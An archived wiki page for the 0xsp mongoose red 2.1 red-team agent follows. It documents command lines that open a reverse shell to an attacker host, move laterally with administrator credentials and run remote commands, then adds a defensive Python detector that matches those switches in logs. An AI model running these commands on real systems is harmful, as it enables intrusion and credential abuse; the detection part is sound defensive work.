This repository has been archived by the owner on May 5, 2022. It is now read-only.

0xsp mongoose red version 2.1

Lawrence Amer edited this page Jul 25, 2020 · 6 revisions

The newer version comes with different techniques and enhancements, and it has been totally remastered from scratch to assist your pen-testing / red teaming operations.

run-as-user windows API weaponization

This feature allows starting a reverse shell directly from the compromised machine using a user's account credentials, with the ability to keep the current session active.

agent.exe -r username password cmd.exe 
[+] trying to Spawn a shell ....!
[*] set RHOST >
remoteattackerip 
[*] set RPORT > 
remote port 

local network enumeration and share hunting

This feature gives accurate results in some tested environments, although firewalls will sometimes stop it from working. It is very helpful for retrieving information about locally connected devices and available shares in AD or the local network.

agent.exe -nds 

exploit detection enhancement

A new technique has been added to 0xsp mongoose red 2.1, which is able to detect newer vulnerabilities by communicating with the Windows Update API to check whether there are missing patches.

agent.exe -e 
[!] Loading exploit definitions inspection module
[!] Loading exploit checking engine

Also, you can send any results to the Node.js application via the following command:

agent.exe -e -o nodejsip -x password 

lateral movements

Lateral movement is one of the required strategies while doing an assessment. With the agent you can start this attack and execute desired commands on the system by specifying the address of the Node.js bidirectional communication channel API. For example, if you want to execute a new process on the targeted system you are attacking, navigate to the Node.js application and choose or type the command you would like to pass.

agent.exe -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip

bidirectional shell

A feature of 0xsp mongoose red for sending commands to, and receiving output from, a compromised system over the web service channel.

agent.exe -cmd -srvhost nodejsip -x password 

interactive plugin interface

Ability to deploy agent plugins through the 0xsp plugins online store: using the interactive shell option, the agent communicates with the web application plugin store to deploy a required plugin onto the operating system.

agent.exe -interactive 
[!] Starting interactive Console ...
[+] available commands : fetch
[*] plugins cli >
fetch
[*] set SRVRHOST
192.168.80.111
[+] Fetching plugins metadata
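
The switch combinations documented on this page are what a blue team sees in process-creation logs, so they can be matched on argument shape alone. The following is an added example, not part of the original wiki or of the 0xsp project: the names `SIGNATURES`, `match` and `redact` are hypothetical, and the sample command lines (paths, `10.0.0.5`, passwords) are constructed.

```python
import shlex

# Switch combinations copied from the usage lines on this page. The image name
# is ignored because a renamed binary keeps the same argument shape.
# Value: (required switches, minimum non-switch values after the first one).
SIGNATURES = {
    "run-as-user shell": (["-r"], 3),  # -r <user> <password> <program>
    "network and share enumeration": (["-nds"], 0),
    "exploit check sent to web service": (["-e", "-o", "-x"], 0),
    "lateral movement": (["-lr", "-host", "-username", "-password", "-srvhost"], 0),
    "bidirectional shell": (["-cmd", "-srvhost", "-x"], 0),
}
SECRET_SWITCHES = {"-password", "-x"}  # the argument that follows is a secret

def split_args(cmdline):
    # posix=False keeps Windows backslashes intact
    return shlex.split(cmdline, posix=False)

def match(cmdline):
    """Return the label of every signature the command line satisfies."""
    low = [a.lower() for a in split_args(cmdline)[1:]]  # drop the image path
    hits = []
    for label, (switches, min_values) in SIGNATURES.items():
        if all(s in low for s in switches):
            after = low[low.index(switches[0]) + 1:]
            if sum(not a.startswith("-") for a in after) >= min_values:
                hits.append(label)
    return hits

def redact(cmdline):
    """Mask credentials so an alert does not copy them into the log store."""
    args = split_args(cmdline)
    hide = set()
    for i, a in enumerate(args):
        if a.lower() in SECRET_SWITCHES:
            hide.add(i + 1)
        elif a.lower() == "-r":
            hide.add(i + 2)  # positional password in the run-as-user form
    return " ".join("<redacted>" if i in hide else a for i, a in enumerate(args))

SAMPLE_EVENTS = [  # constructed process-creation command lines
    r"C:\Users\Public\svc.exe -lr -host 192.168.14.1 -username administrator -password blabla -srvhost 10.0.0.5",
    r"C:\Temp\agent.exe -e -o 10.0.0.5 -x s3cret",
    r"C:\Windows\System32\ping.exe -n 4 10.0.0.5",
    r"C:\Temp\a.exe -r alice hunter2 cmd.exe",
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        if match(event):
            print(match(event), redact(event))
```

The single-switch rules (`-r`, `-nds`) are weak on their own and are best correlated with the parent process or the outbound connection that follows.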